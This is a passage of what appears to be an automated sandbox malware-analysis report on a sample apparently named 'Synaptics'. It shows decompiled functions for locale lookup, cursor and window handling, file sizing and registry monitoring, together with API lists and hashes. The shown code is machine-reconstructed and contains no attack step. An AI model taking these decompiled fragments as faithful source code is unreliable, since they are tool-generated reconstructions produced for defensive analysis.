                                                                                                                                                                                          0x0040cd80
                                                                                                                                                                                          0x0040cd8a
                                                                                                                                                                                          0x0040cd8f
                                                                                                                                                                                          0x0040cd8f
                                                                                                                                                                                          0x0040cd67
                                                                                                                                                                                          0x0040ccf8
                                                                                                                                                                                          0x0040ccf8
                                                                                                                                                                                          0x0040ccfd
                                                                                                                                                                                          0x0040cd00
                                                                                                                                                                                          0x0040cd0e
                                                                                                                                                                                          0x0040cd0a
                                                                                                                                                                                          0x0040cd0a
                                                                                                                                                                                          0x0040cd0a
                                                                                                                                                                                          0x0040cd12
                                                                                                                                                                                          0x0040cd4d
                                                                                                                                                                                          0x0040cd14
                                                                                                                                                                                          0x0040cd39
                                                                                                                                                                                          0x0040cd1a
                                                                                                                                                                                          0x0040cd1a
                                                                                                                                                                                          0x0040cd1c
                                                                                                                                                                                          0x0040cd1e
                                                                                                                                                                                          0x0040cd20
                                                                                                                                                                                          0x0040cd29
                                                                                                                                                                                          0x0040cd33
                                                                                                                                                                                          0x0040cd33
                                                                                                                                                                                          0x0040cd20
                                                                                                                                                                                          0x0040cd38
                                                                                                                                                                                          0x0040cd38
                                                                                                                                                                                          0x0040cd38
                                                                                                                                                                                          0x0040cd44
                                                                                                                                                                                          0x0040cd12
                                                                                                                                                                                          0x0040ce4b
                                                                                                                                                                                          0x0040ce4d
                                                                                                                                                                                          0x0040ce50
                                                                                                                                                                                          0x0040ce53
                                                                                                                                                                                          0x0040ce65

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(?,00000000,0040CE66,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040CCCB
                                                                                                                                                                                            • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Locale$InfoThread
                                                                                                                                                                                          • String ID: eeee$ggg$yyyy
                                                                                                                                                                                          • API String ID: 4232894706-1253427255
                                                                                                                                                                                          • Opcode ID: d7b8b7849bcb72c5027e917725a1694d305817c4d1b349c38790e114d213c5c8
                                                                                                                                                                                          • Instruction ID: 4a597fd56ac0f87983323c6834d704910f88c0d9acca8889b228a53315074fe8
                                                                                                                                                                                          • Opcode Fuzzy Hash: d7b8b7849bcb72c5027e917725a1694d305817c4d1b349c38790e114d213c5c8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0541E5B0314504CBE711AB7AC8C12BEB69ADF85304BA1463BE542B37C5D63CED0782AD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004392CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                          			E004392CC(intOrPtr __eax, intOrPtr __ecx, void* __edx, void* __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				intOrPtr _v24;
				char _v28;
				char _v36;
				void* __edi;
				void* __ebp;
				intOrPtr _t54;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				void* _t88;
				intOrPtr _t105;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t120;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t129;
				void* _t133;
				intOrPtr _t134;
				void* _t137;

				_t137 = __fp0;
				_v8 = __ecx;
				_t88 = __edx;
				_t124 = __eax;
				 *0x49eb34 = __eax;
				_push(_t133);
				_push(0x439471);
				_push( *[fs:edx]);
				 *[fs:edx] = _t134;
				_v12 = 0;
				 *0x49eb3c = 0;
				_t135 =  *((char*)(__eax + 0x9b));
				if( *((char*)(__eax + 0x9b)) != 0) {
					E00403DE8(__eax, __eflags);
					__eflags =  *0x49eb34;
					if( *0x49eb34 != 0) {
						__eflags = _v12;
						if(_v12 == 0) {
							_v12 = E00438690(1, _t124);
							 *0x49eb3c = 1;
						}
						_t128 =  *((intOrPtr*)(_v12 + 0x38));
						_t105 =  *0x437498; // 0x4374e4
						_t54 = E00403D78( *((intOrPtr*)(_v12 + 0x38)), _t105);
						__eflags = _t54;
						if(_t54 == 0) {
							_t129 =  *((intOrPtr*)(_v12 + 0x38));
							__eflags =  *((intOrPtr*)(_t129 + 0x30));
							if( *((intOrPtr*)(_t129 + 0x30)) != 0) {
								L14:
								__eflags = 0;
								E004197DC(0,  &_v36, 0);
								E0043AA94(_t129,  &_v28,  &_v36);
								_t60 = _v12;
								 *((intOrPtr*)(_t60 + 0x44)) = _v28;
								 *((intOrPtr*)(_t60 + 0x48)) = _v24;
								L15:
								__eflags =  *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48));
								E004197DC( *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48)),  &_v28,  *((intOrPtr*)(_v12 + 0x48)) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x4c)));
								_t65 = _v12;
								 *((intOrPtr*)(_t65 + 0x4c)) = _v28;
								 *((intOrPtr*)(_t65 + 0x50)) = _v24;
								goto L16;
							}
							_t116 =  *0x437498; // 0x4374e4
							_t71 = E00403D78(_t129, _t116);
							__eflags = _t71;
							if(_t71 != 0) {
								goto L14;
							}
							GetCursorPos( &_v20);
							_t74 = _v12;
							 *(_t74 + 0x44) = _v20.x;
							 *((intOrPtr*)(_t74 + 0x48)) = _v20.y;
							goto L15;
						} else {
							GetWindowRect(E00441704(_t128), _v12 + 0x44);
							L16:
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							L17:
							E0043915C(_v12, _v8, _t88, _t133, _t137);
							_pop(_t115);
							 *[fs:eax] = _t115;
							return 0;
						}
					}
					_pop(_t120);
					 *[fs:eax] = _t120;
					return 0;
				}
				E00403DE8(__eax, _t135);
				if( *0x49eb34 != 0) {
					__eflags = _v12;
					if(_v12 == 0) {
						_v12 = E00438578(_t124, 1);
						 *0x49eb3c = 1;
					}
					goto L17;
				}
				_pop(_t123);
				 *[fs:eax] = _t123;
				return 0;
			}



























                                                                                                                                                                                          0x004392cc
                                                                                                                                                                                          0x004392d5
                                                                                                                                                                                          0x004392d8
                                                                                                                                                                                          0x004392da
                                                                                                                                                                                          0x004392dc
                                                                                                                                                                                          0x004392e4
                                                                                                                                                                                          0x004392e5
                                                                                                                                                                                          0x004392ea
                                                                                                                                                                                          0x004392ed
                                                                                                                                                                                          0x004392f2
                                                                                                                                                                                          0x004392f5
                                                                                                                                                                                          0x004392fc
                                                                                                                                                                                          0x00439303
                                                                                                                                                                                          0x00439359
                                                                                                                                                                                          0x0043935e
                                                                                                                                                                                          0x00439365
                                                                                                                                                                                          0x00439374
                                                                                                                                                                                          0x00439378
                                                                                                                                                                                          0x00439388
                                                                                                                                                                                          0x0043938b
                                                                                                                                                                                          0x0043938b
                                                                                                                                                                                          0x00439395
                                                                                                                                                                                          0x0043939a
                                                                                                                                                                                          0x004393a0
                                                                                                                                                                                          0x004393a5
                                                                                                                                                                                          0x004393a7
                                                                                                                                                                                          0x004393c5
                                                                                                                                                                                          0x004393c8
                                                                                                                                                                                          0x004393cc
                                                                                                                                                                                          0x004393f9
                                                                                                                                                                                          0x004393fe
                                                                                                                                                                                          0x00439400
                                                                                                                                                                                          0x0043940d
                                                                                                                                                                                          0x00439412
                                                                                                                                                                                          0x00439418
                                                                                                                                                                                          0x0043941e
                                                                                                                                                                                          0x00439421
                                                                                                                                                                                          0x00439433
                                                                                                                                                                                          0x00439439
                                                                                                                                                                                          0x0043943e
                                                                                                                                                                                          0x00439444
                                                                                                                                                                                          0x0043944a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043944a
                                                                                                                                                                                          0x004393d0
                                                                                                                                                                                          0x004393d6
                                                                                                                                                                                          0x004393db
                                                                                                                                                                                          0x004393dd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004393e3
                                                                                                                                                                                          0x004393e8
                                                                                                                                                                                          0x004393ee
                                                                                                                                                                                          0x004393f4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004393a9
                                                                                                                                                                                          0x004393b8
                                                                                                                                                                                          0x0043944d
                                                                                                                                                                                          0x00439456
                                                                                                                                                                                          0x00439457
                                                                                                                                                                                          0x00439458
                                                                                                                                                                                          0x00439459
                                                                                                                                                                                          0x0043945a
                                                                                                                                                                                          0x00439462
                                                                                                                                                                                          0x00439469
                                                                                                                                                                                          0x0043946c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043946c
                                                                                                                                                                                          0x004393a7
                                                                                                                                                                                          0x00439369
                                                                                                                                                                                          0x0043936c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043936c
                                                                                                                                                                                          0x0043930e
                                                                                                                                                                                          0x0043931a
                                                                                                                                                                                          0x00439329
                                                                                                                                                                                          0x0043932d
                                                                                                                                                                                          0x00439341
                                                                                                                                                                                          0x00439344
                                                                                                                                                                                          0x00439344
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0043932d
                                                                                                                                                                                          0x0043931e
                                                                                                                                                                                          0x00439321
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: \`C$tC
                                                                                                                                                                                          • API String ID: 0-3452953066
                                                                                                                                                                                          • Opcode ID: e5d5e564f27f167b08a4427dd497db7147cd8b509a43d3ade783cb6889831ebe
                                                                                                                                                                                          • Instruction ID: 1d99dae1233738e974a732b918af4f5548ca7b3dae0a6c744bb57b2c2fe5a1b7
                                                                                                                                                                                          • Opcode Fuzzy Hash: e5d5e564f27f167b08a4427dd497db7147cd8b509a43d3ade783cb6889831ebe
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F519170A046059FCB00DF9AD481A9EBBF5FF9C314F10906BE805A7361D779AD81CB59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0043915C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                          			E0043915C(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
				intOrPtr _v16;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				struct HWND__* _t38;
				intOrPtr _t39;
				intOrPtr* _t41;
				intOrPtr _t45;
				intOrPtr _t49;
				intOrPtr* _t53;
				long _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr _t70;
				intOrPtr* _t77;
				void* _t79;
				intOrPtr* _t80;
				long long _t87;

				_t87 = __fp0;
				_t80 = _t79 + 0xfffffff8;
				_t70 = __ecx;
				_t45 = __edx;
				_t77 = __eax;
				 *0x49eb38 = __eax;
				_t24 =  *0x49eb38; // 0x0
				 *((intOrPtr*)(_t24 + 4)) = 0;
				GetCursorPos(0x49eb44);
				_t26 =  *0x49eb38; // 0x0
				_t58 = 0x49eb44->x; // 0x0
				 *(_t26 + 0xc) = _t58;
				_t59 =  *0x49eb48; // 0x0
				 *((intOrPtr*)(_t26 + 0x10)) = _t59;
				 *0x49eb4c = GetCursor();
				_t28 =  *0x49eb38; // 0x0
				 *0x49eb40 = E00438388(_t28);
				 *0x49eb50 = _t70;
				_t60 =  *0x4360a0; // 0x4360ec
				if(E00403D78(_t77, _t60) == 0) {
					__eflags = _t45;
					if(__eflags == 0) {
						 *0x49eb54 = 0;
					} else {
						 *0x49eb54 = 1;
					}
				} else {
					_t65 = _t77;
					_t4 = _t65 + 0x44; // 0x44
					_t41 = _t4;
					_t49 =  *_t41;
					if( *((intOrPtr*)(_t41 + 8)) - _t49 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t65 + 0x20)) = 0;
						 *((intOrPtr*)(_t65 + 0x24)) = 0;
					} else {
						 *_t80 =  *((intOrPtr*)(_t65 + 0xc)) - _t49;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t41 + 8)) -  *_t41;
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t65 + 0x20)) = __fp0;
						asm("wait");
					}
					_t66 =  *((intOrPtr*)(_t41 + 4));
					if( *((intOrPtr*)(_t41 + 0xc)) - _t66 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t77 + 0x28)) = 0;
						 *((intOrPtr*)(_t77 + 0x2c)) = 0;
					} else {
						_t53 = _t77;
						 *_t80 =  *((intOrPtr*)(_t53 + 0x10)) - _t66;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t41 + 0xc)) -  *((intOrPtr*)(_t41 + 4));
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t53 + 0x28)) = _t87;
						asm("wait");
					}
					if(_t45 == 0) {
						 *0x49eb54 = 0;
					} else {
						 *0x49eb54 = 2;
						 *((intOrPtr*)( *_t77 + 0x30))();
					}
				}
				_t32 =  *0x49eb38; // 0x0
				 *0x49eb58 =  *((intOrPtr*)( *_t32 + 8))();
				_t85 =  *0x49eb58;
				if( *0x49eb58 != 0) {
					_t37 =  *0x49eb48; // 0x0
					_t38 = GetDesktopWindow();
					_t39 =  *0x49eb58; // 0x0
					E00443038(_t39, _t38, _t85, _t37);
				}
				_t35 = E00403BBC(1);
				 *0x49eb60 = _t35;
				if( *0x49eb54 != 0) {
					_t35 = E00438E8C(0x49eb44, 1);
				}
				return _t35;
			}


























                                                                                                                                                                                          0x0043915c
                                                                                                                                                                                          0x0043915f
                                                                                                                                                                                          0x00439162
                                                                                                                                                                                          0x00439164
                                                                                                                                                                                          0x00439166
                                                                                                                                                                                          0x00439168
                                                                                                                                                                                          0x0043916e
                                                                                                                                                                                          0x00439175
                                                                                                                                                                                          0x0043917d
                                                                                                                                                                                          0x00439182
                                                                                                                                                                                          0x00439187
                                                                                                                                                                                          0x0043918d
                                                                                                                                                                                          0x00439190
                                                                                                                                                                                          0x00439196
                                                                                                                                                                                          0x0043919e
                                                                                                                                                                                          0x004391a3
                                                                                                                                                                                          0x004391ad
                                                                                                                                                                                          0x004391b2
                                                                                                                                                                                          0x004391ba
                                                                                                                                                                                          0x004391c7
                                                                                                                                                                                          0x00439259
                                                                                                                                                                                          0x0043925b
                                                                                                                                                                                          0x00439266
                                                                                                                                                                                          0x0043925d
                                                                                                                                                                                          0x0043925d
                                                                                                                                                                                          0x0043925d
                                                                                                                                                                                          0x004391cd
                                                                                                                                                                                          0x004391cd
                                                                                                                                                                                          0x004391cf
                                                                                                                                                                                          0x004391cf
                                                                                                                                                                                          0x004391d5
                                                                                                                                                                                          0x004391db
                                                                                                                                                                                          0x004391fd
                                                                                                                                                                                          0x004391ff
                                                                                                                                                                                          0x00439202
                                                                                                                                                                                          0x004391dd
                                                                                                                                                                                          0x004391e2
                                                                                                                                                                                          0x004391e5
                                                                                                                                                                                          0x004391ed
                                                                                                                                                                                          0x004391f1
                                                                                                                                                                                          0x004391f5
                                                                                                                                                                                          0x004391f7
                                                                                                                                                                                          0x004391fa
                                                                                                                                                                                          0x004391fa
                                                                                                                                                                                          0x00439208
                                                                                                                                                                                          0x0043920f
                                                                                                                                                                                          0x00439234
                                                                                                                                                                                          0x00439236
                                                                                                                                                                                          0x00439239
                                                                                                                                                                                          0x00439211
                                                                                                                                                                                          0x00439211
                                                                                                                                                                                          0x00439218
                                                                                                                                                                                          0x0043921b
                                                                                                                                                                                          0x00439224
                                                                                                                                                                                          0x00439228
                                                                                                                                                                                          0x0043922c
                                                                                                                                                                                          0x0043922e
                                                                                                                                                                                          0x00439231
                                                                                                                                                                                          0x00439231
                                                                                                                                                                                          0x0043923e
                                                                                                                                                                                          0x00439250
                                                                                                                                                                                          0x00439240
                                                                                                                                                                                          0x00439240
                                                                                                                                                                                          0x0043924b
                                                                                                                                                                                          0x0043924b
                                                                                                                                                                                          0x0043923e
                                                                                                                                                                                          0x0043926d
                                                                                                                                                                                          0x00439277
                                                                                                                                                                                          0x0043927c
                                                                                                                                                                                          0x00439283
                                                                                                                                                                                          0x00439285
                                                                                                                                                                                          0x0043928b
                                                                                                                                                                                          0x00439298
                                                                                                                                                                                          0x0043929d
                                                                                                                                                                                          0x0043929d
                                                                                                                                                                                          0x004392a9
                                                                                                                                                                                          0x004392ae
                                                                                                                                                                                          0x004392ba
                                                                                                                                                                                          0x004392c1
                                                                                                                                                                                          0x004392c1
                                                                                                                                                                                          0x004392cb

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCursorPos.USER32(0049EB44), ref: 0043917D
                                                                                                                                                                                          • GetCursor.USER32(0049EB44), ref: 00439199
                                                                                                                                                                                            • Part of subcall function 00438388: SetCapture.USER32(00000000,Function_0003850C,00000000,?,004391AD,0049EB44), ref: 00438397
                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0043928B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Cursor$CaptureDesktopWindow
                                                                                                                                                                                          • String ID: `C
                                                                                                                                                                                          • API String ID: 669539147-1847193361
                                                                                                                                                                                          • Opcode ID: cfadc6313aaa1f90bca02bf8b4a617acf16d5f6779200e1ed14d9dce04a29a12
                                                                                                                                                                                          • Instruction ID: c6ff30aa0831a605475be7d7daa41799f87f77b36a22a6f0c8b6adc85e5341f0
                                                                                                                                                                                          • Opcode Fuzzy Hash: cfadc6313aaa1f90bca02bf8b4a617acf16d5f6779200e1ed14d9dce04a29a12
                                                                                                                                                                                          • Instruction Fuzzy Hash: D441BE716096009FD304DF2ED948616BBE1FB88310F1989BFE44A8B3A1DB75EC41CB4A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004412BC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004412BC(void* __eax, intOrPtr __ecx, intOrPtr __edx) {
				char _t23;
				struct HWND__* _t42;
				void* _t43;
				intOrPtr _t47;
				void* _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				intOrPtr* _t59;

				 *((intOrPtr*)(_t59 + 4)) = __ecx;
				 *_t59 = __edx;
				_t54 = __eax;
				_t42 =  *(__eax + 0x180);
				if(_t42 == 0 || IsWindowVisible(_t42) == 0) {
					_t23 = 0;
				} else {
					_t23 = 1;
				}
				 *((char*)(_t59 + 8)) = _t23;
				if( *((char*)(_t59 + 8)) != 0) {
					ScrollWindow( *(_t54 + 0x180),  *(_t59 + 0xc),  *(_t59 + 0xc), 0, 0);
				}
				_t56 = E0043E434(_t54) - 1;
				if(_t56 < 0) {
					L14:
					return E0043DFC4();
				} else {
					_t57 = _t56 + 1;
					_t58 = 0;
					do {
						_t43 = E0043E3F8(_t54, _t58);
						_t47 =  *0x437498; // 0x4374e4
						if(E00403D78(_t43, _t47) == 0 ||  *(_t43 + 0x180) == 0) {
							 *((intOrPtr*)(_t43 + 0x40)) =  *((intOrPtr*)(_t43 + 0x40)) +  *_t59;
							 *((intOrPtr*)(_t43 + 0x44)) =  *((intOrPtr*)(_t43 + 0x44)) +  *((intOrPtr*)(_t59 + 4));
						} else {
							if( *((char*)(_t59 + 8)) == 0) {
								SetWindowPos( *(_t43 + 0x180), 0,  *((intOrPtr*)(_t43 + 0x40)) +  *((intOrPtr*)(_t59 + 0x10)),  *((intOrPtr*)(_t34 + 0x44)) +  *((intOrPtr*)(_t59 + 0x10)),  *(_t34 + 0x48),  *(_t34 + 0x4c), 0x14);
							}
						}
						_t58 = _t58 + 1;
						_t57 = _t57 - 1;
					} while (_t57 != 0);
					goto L14;
				}
			}












                                                                                                                                                                                          0x004412c3
                                                                                                                                                                                          0x004412c7
                                                                                                                                                                                          0x004412ca
                                                                                                                                                                                          0x004412cc
                                                                                                                                                                                          0x004412d4
                                                                                                                                                                                          0x004412e0
                                                                                                                                                                                          0x004412e4
                                                                                                                                                                                          0x004412e4
                                                                                                                                                                                          0x004412e4
                                                                                                                                                                                          0x004412e6
                                                                                                                                                                                          0x004412ef
                                                                                                                                                                                          0x00441306
                                                                                                                                                                                          0x00441306
                                                                                                                                                                                          0x00441314
                                                                                                                                                                                          0x00441317
                                                                                                                                                                                          0x00441385
                                                                                                                                                                                          0x00441393
                                                                                                                                                                                          0x00441319
                                                                                                                                                                                          0x00441319
                                                                                                                                                                                          0x0044131a
                                                                                                                                                                                          0x0044131c
                                                                                                                                                                                          0x00441325
                                                                                                                                                                                          0x00441329
                                                                                                                                                                                          0x00441336
                                                                                                                                                                                          0x00441344
                                                                                                                                                                                          0x0044134b
                                                                                                                                                                                          0x00441350
                                                                                                                                                                                          0x00441355
                                                                                                                                                                                          0x0044137c
                                                                                                                                                                                          0x0044137c
                                                                                                                                                                                          0x00441355
                                                                                                                                                                                          0x00441381
                                                                                                                                                                                          0x00441382
                                                                                                                                                                                          0x00441382
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0044131c

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 004412D7
                                                                                                                                                                                          • ScrollWindow.USER32 ref: 00441306
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0044137C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$ScrollVisible
                                                                                                                                                                                          • String ID: tC
                                                                                                                                                                                          • API String ID: 4127837035-1085749316
                                                                                                                                                                                          • Opcode ID: d061b127602184be2c9b7ae61929e2cc317074fc455f50c5d15f50e3c6057b0d
                                                                                                                                                                                          • Instruction ID: d3335ac6ad808ac153b7fdabc62b5b7bad948aac8996c4e76790ef358f9a02f4
                                                                                                                                                                                          • Opcode Fuzzy Hash: d061b127602184be2c9b7ae61929e2cc317074fc455f50c5d15f50e3c6057b0d
                                                                                                                                                                                          • Instruction Fuzzy Hash: AA219F71704700AFE710DF6AC880B6B77D4AF88754F14856EFA48CB262D738EC45875A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0047D01C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,00000000,0047D0D2), ref: 0047D05E
                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,0047D0B5,?,00000000,80000000,00000001,00000000), ref: 0047D096
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,0047D0BC,00000000,00000000,00000000,00000000,00000000,0047D0B5,?,00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 0047D0AF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                          • String ID: lI
                                                                                                                                                                                          • API String ID: 1378416451-2224401619
                                                                                                                                                                                          • Opcode ID: 4e7cede00021d9a545cc8d8f6fe96a31d1f967a6106aac91d2e12231ee3ddd71
                                                                                                                                                                                          • Instruction ID: 286afb8c99021898e2bdb5b6e8095afefc1f981a6a11c4acb5445e704e613de7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e7cede00021d9a545cc8d8f6fe96a31d1f967a6106aac91d2e12231ee3ddd71
                                                                                                                                                                                          • Instruction Fuzzy Hash: D6117970A04204BFEB11DBA9CC52F5AB7B8EB09704F5184B6FA14E76D0DA79AD108A18
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00494694 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E00494694(void* __eax) {
				long _t18;
				void* _t20;
				void* _t21;

				_t21 = __eax;
				 *((intOrPtr*)(__eax + 0x48)) = 5;
				 *(_t21 + 0x50) = CreateEventA(0, 0xffffffff, 0, 0);
				 *((intOrPtr*)(_t21 + 0x4c)) = CreateEventA(0, 0xffffffff, 0, 0);
				asm("cmc");
				asm("sbb eax, eax");
				_t18 = RegNotifyChangeKeyValue( *( *((intOrPtr*)(_t21 + 0x40)) + 4),  *(_t21 + 0x44),  *(_t21 + 0x48),  *(_t21 + 0x50), 0xffffffff);
				if(_t18 != 0) {
					_t20 = E0040D144("Can not start monitoring", 1);
					E00404378();
					return _t20;
				}
				return _t18;
			}






                                                                                                                                                                                          0x00494695
                                                                                                                                                                                          0x00494697
                                                                                                                                                                                          0x004946ab
                                                                                                                                                                                          0x004946bb
                                                                                                                                                                                          0x004946cf
                                                                                                                                                                                          0x004946d0
                                                                                                                                                                                          0x004946da
                                                                                                                                                                                          0x004946e1
                                                                                                                                                                                          0x004946ef
                                                                                                                                                                                          0x004946f4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004946f4
                                                                                                                                                                                          0x004946fa

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946A6
                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000,00000000,000000FF,00000000,00000000,?,004945DD), ref: 004946B6
